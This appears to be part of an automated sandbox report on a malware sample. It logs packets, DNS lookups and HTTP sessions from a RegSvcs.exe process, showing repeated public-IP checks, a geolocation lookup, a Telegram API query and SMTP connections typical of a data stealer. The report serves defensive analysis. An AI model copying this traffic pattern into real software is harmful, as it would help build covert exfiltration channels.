Oct 29, 2024 10:32:36.696157932 CET	51302	587	192.168.2.8	166.62.28.124
Oct 29, 2024 10:32:36.702416897 CET	587	51302	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:36.702476978 CET	51302	587	192.168.2.8	166.62.28.124
Oct 29, 2024 10:32:43.423846960 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:43.473285913 CET	51301	587	192.168.2.8	166.62.28.124
Oct 29, 2024 10:34:10.661317110 CET	51301	587	192.168.2.8	166.62.28.124
Oct 29, 2024 10:34:10.666754961 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:34:10.996620893 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:34:10.997210979 CET	51301	587	192.168.2.8	166.62.28.124

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 29, 2024 10:32:07.681896925 CET	60407	53	192.168.2.8	1.1.1.1
Oct 29, 2024 10:32:07.690099001 CET	53	60407	1.1.1.1	192.168.2.8
Oct 29, 2024 10:32:09.369667053 CET	64028	53	192.168.2.8	1.1.1.1
Oct 29, 2024 10:32:09.377613068 CET	53	64028	1.1.1.1	192.168.2.8
Oct 29, 2024 10:32:23.951419115 CET	52004	53	192.168.2.8	1.1.1.1
Oct 29, 2024 10:32:23.958961010 CET	53	52004	1.1.1.1	192.168.2.8
Oct 29, 2024 10:32:27.496738911 CET	53	60191	1.1.1.1	192.168.2.8
Oct 29, 2024 10:32:30.644946098 CET	57910	53	192.168.2.8	1.1.1.1
Oct 29, 2024 10:32:30.680598021 CET	53	57910	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 29, 2024 10:32:07.681896925 CET	192.168.2.8	1.1.1.1	0x7f1f	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 29, 2024 10:32:09.369667053 CET	192.168.2.8	1.1.1.1	0xd45c	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 29, 2024 10:32:23.951419115 CET	192.168.2.8	1.1.1.1	0x99d7	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Oct 29, 2024 10:32:30.644946098 CET	192.168.2.8	1.1.1.1	0x9c24	Standard query (0)	mail.bulatpharmaceutical.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 29, 2024 10:32:07.690099001 CET	1.1.1.1	192.168.2.8	0x7f1f	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 29, 2024 10:32:07.690099001 CET	1.1.1.1	192.168.2.8	0x7f1f	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 29, 2024 10:32:07.690099001 CET	1.1.1.1	192.168.2.8	0x7f1f	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 29, 2024 10:32:07.690099001 CET	1.1.1.1	192.168.2.8	0x7f1f	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 29, 2024 10:32:07.690099001 CET	1.1.1.1	192.168.2.8	0x7f1f	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 29, 2024 10:32:07.690099001 CET	1.1.1.1	192.168.2.8	0x7f1f	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 29, 2024 10:32:09.377613068 CET	1.1.1.1	192.168.2.8	0xd45c	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 29, 2024 10:32:09.377613068 CET	1.1.1.1	192.168.2.8	0xd45c	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 29, 2024 10:32:23.958961010 CET	1.1.1.1	192.168.2.8	0x99d7	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Oct 29, 2024 10:32:30.680598021 CET	1.1.1.1	192.168.2.8	0x9c24	No error (0)	mail.bulatpharmaceutical.com		166.62.28.124	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49706	132.226.247.73	80	4684	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 10:32:07.731638908 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 29, 2024 10:32:08.603444099 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:08 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b7d76868353ee928349b8b52f356fae3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>
Oct 29, 2024 10:32:08.626177073 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 29, 2024 10:32:08.858725071 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:08 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b7d76868353ee928349b8b52f356fae3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>
Oct 29, 2024 10:32:09.117115974 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:08 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f1e486fb3e3d952511a6002e75af9db3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>
Oct 29, 2024 10:32:10.324299097 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 29, 2024 10:32:10.745311975 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:10 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4689413c242340d1e9093198a83f2113 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>
Oct 29, 2024 10:32:10.830564976 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:10 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4689413c242340d1e9093198a83f2113 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49711	132.226.247.73	80	4684	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 10:32:11.529793978 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 29, 2024 10:32:12.402126074 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:12 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d463c608aafb451730ce9305080bf4b4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49713	132.226.247.73	80	5520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 10:32:12.035482883 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 29, 2024 10:32:12.895251036 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:12 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 57ab29d65ecb0ce8089081d1312583b4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>
Oct 29, 2024 10:32:12.899035931 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 29, 2024 10:32:13.158274889 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:13 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 935a476eb3f7bc1b33cfcaf51773d19a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>
Oct 29, 2024 10:32:14.860534906 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 29, 2024 10:32:15.308631897 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:14 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 47bca26edcc4e7d98cfbfe9e20ad5911 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>
Oct 29, 2024 10:32:15.354543924 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:14 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 47bca26edcc4e7d98cfbfe9e20ad5911 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49716	132.226.247.73	80	4684	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 10:32:13.205212116 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 29, 2024 10:32:14.071921110 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:13 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6f52e1f7ea55d9ee67688e66e2fd3756 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49718	132.226.247.73	80	4684	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 10:32:14.988234997 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 29, 2024 10:32:15.869275093 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:15 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ef6d8ec2cc003029cca2b700bd5534bb Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49721	132.226.247.73	80	5520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 10:32:16.083441019 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 29, 2024 10:32:16.957869053 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:16 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 39cf90f897d6ac57823ae1204088864f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49722	132.226.247.73	80	4684	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 10:32:16.643260002 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 29, 2024 10:32:17.513854980 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:17 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0bd6f7de4b34efbb6f823777918912e5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49725	132.226.247.73	80	5520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 10:32:17.892374039 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 29, 2024 10:32:18.725027084 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:18 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 76c2dbc47630446c8eeb61b1b731c31c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49726	132.226.247.73	80	4684	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 10:32:18.396279097 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 29, 2024 10:32:19.287914038 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:19 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 83bda3155908fcb9b575f1c4d5a82aa5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49729	132.226.247.73	80	5520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 10:32:19.494723082 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 29, 2024 10:32:20.371212006 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:20 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 42cd572c4cc67532f0b751c44db0aed0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49730	132.226.247.73	80	4684	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 10:32:20.063855886 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 29, 2024 10:32:20.951654911 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:20 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 65ec647038fb1dd68c799ad89ecafccf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49734	132.226.247.73	80	5520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 10:32:21.177700996 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 29, 2024 10:32:22.051558971 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:21 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8c18ca90384de549528646353f662047 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49736	132.226.247.73	80	4684	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 10:32:21.719115019 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 29, 2024 10:32:22.577249050 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:32:22 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5752cb9387b0274121c27915c5532909 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49740	132.226.247.73	80	5520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 10:32:23.945293903 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
